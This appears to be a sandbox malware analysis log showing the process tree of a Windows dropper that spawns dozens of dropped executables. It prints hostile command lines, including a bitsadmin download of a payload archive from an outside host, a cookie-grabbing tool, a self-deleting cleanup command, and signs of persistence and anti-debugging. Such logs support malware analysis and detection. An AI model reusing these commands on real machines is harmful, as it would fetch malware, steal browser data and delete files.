PID:4068

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_2.exe
arnatic_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3104

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_3.exe
arnatic_3.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_4.exe
arnatic_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4732

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Suspicious use of SetThreadContext
PID:5084

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3092

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_5.exe
arnatic_5.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Users\Admin\AppData\Roaming\1126656.exe
"C:\Users\Admin\AppData\Roaming\1126656.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Users\Admin\AppData\Roaming\5925079.exe
"C:\Users\Admin\AppData\Roaming\5925079.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Users\Admin\AppData\Roaming\3081054.exe
"C:\Users\Admin\AppData\Roaming\3081054.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3144

C:\Users\Admin\AppData\Roaming\1100866.exe
"C:\Users\Admin\AppData\Roaming\1100866.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:684

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
7⤵
- Executes dropped EXE
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3368

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
arnatic_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3804

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2720

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_6.exe
arnatic_6.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3712

C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
"C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4572

C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
7⤵
- Executes dropped EXE
PID:5004

C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
"C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4304

C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
7⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe
"C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1128

C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
"C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4744

C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
7⤵
- Executes dropped EXE
PID:4960

C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe
"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4928

C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe
"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"
7⤵
PID:5480

C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe
"C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4792

C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
"C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2088

C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
7⤵
- Executes dropped EXE
PID:4100

C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe
"C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"
6⤵
- Executes dropped EXE
PID:4652

C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
"C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2060

C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
7⤵
- Executes dropped EXE
PID:4224

C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe
"C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4140

C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe
"C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:4820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:5212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:5260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
- Checks for any installed AV software in registry
PID:6152

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
7⤵
- Download via BitsAdmin
PID:5612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4820

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
- Executes dropped EXE
PID:4884

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
- Executes dropped EXE
PID:7080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:7112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6544

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:5000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6420

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
7⤵
- Loads dropped DLL
PID:5308

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
8⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:6988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:5276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:2436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:5696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:5184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
7⤵
PID:6512

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
7⤵
- Loads dropped DLL
PID:5500

C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe
"C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2144

C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe
"C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe"
6⤵
- Executes dropped EXE
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
7⤵
- Program crash
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 676
7⤵
- Program crash
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 652
7⤵
- Program crash
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
7⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 888
7⤵
- Program crash
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1108
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5804

C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
"C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"
6⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
"C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe" -a
7⤵
- Executes dropped EXE
PID:4664

C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe
"C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:5844

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f
8⤵
- Kills process with taskkill
PID:1516

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:7108

C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe
"C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe"
6⤵
- Executes dropped EXE
PID:1040

C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
"C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:412

C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
"C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5480

C:\Program Files (x86)\Browzar\Browzar.exe
"C:\Program Files (x86)\Browzar\Browzar.exe"
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:3876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 2752
8⤵
- Program crash
PID:6236

C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe
"C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe"
6⤵
- Executes dropped EXE
PID:5084

C:\Program Files (x86)\Company\NewProduct\file4.exe
"C:\Program Files (x86)\Company\NewProduct\file4.exe"
7⤵
PID:2192

C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
"C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:3940

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
8⤵
- Loads dropped DLL
PID:5788

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4536

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
7⤵
- Executes dropped EXE
PID:4872

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
- Executes dropped EXE
PID:5508

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
- Executes dropped EXE
PID:5632

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
PID:6496

C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
"C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
6⤵
- Executes dropped EXE
PID:5072

C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
"C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 760
7⤵
- Program crash
PID:6916

C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe
"C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe"
6⤵
- Executes dropped EXE
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
7⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:8

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3b474f50,0x7ffa3b474f60,0x7ffa3b474f70
8⤵
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1788 /prefetch:2
8⤵
PID:4404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:8
8⤵
PID:4236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:8
8⤵
PID:4172

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
8⤵
PID:508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
8⤵
- Executes dropped EXE
PID:2192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
8⤵
PID:3624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
8⤵
PID:5156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
8⤵
PID:5148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
8⤵
PID:5140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
8⤵
PID:5564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
8⤵
PID:5604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:8
8⤵
PID:3260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:8
8⤵
PID:6184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3520 /prefetch:8
8⤵
PID:5692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:8
8⤵
PID:6388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8
8⤵
PID:6984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4168 /prefetch:8
8⤵
PID:5708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8
8⤵
PID:4104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:8
8⤵
PID:744

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
8⤵
PID:1248

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
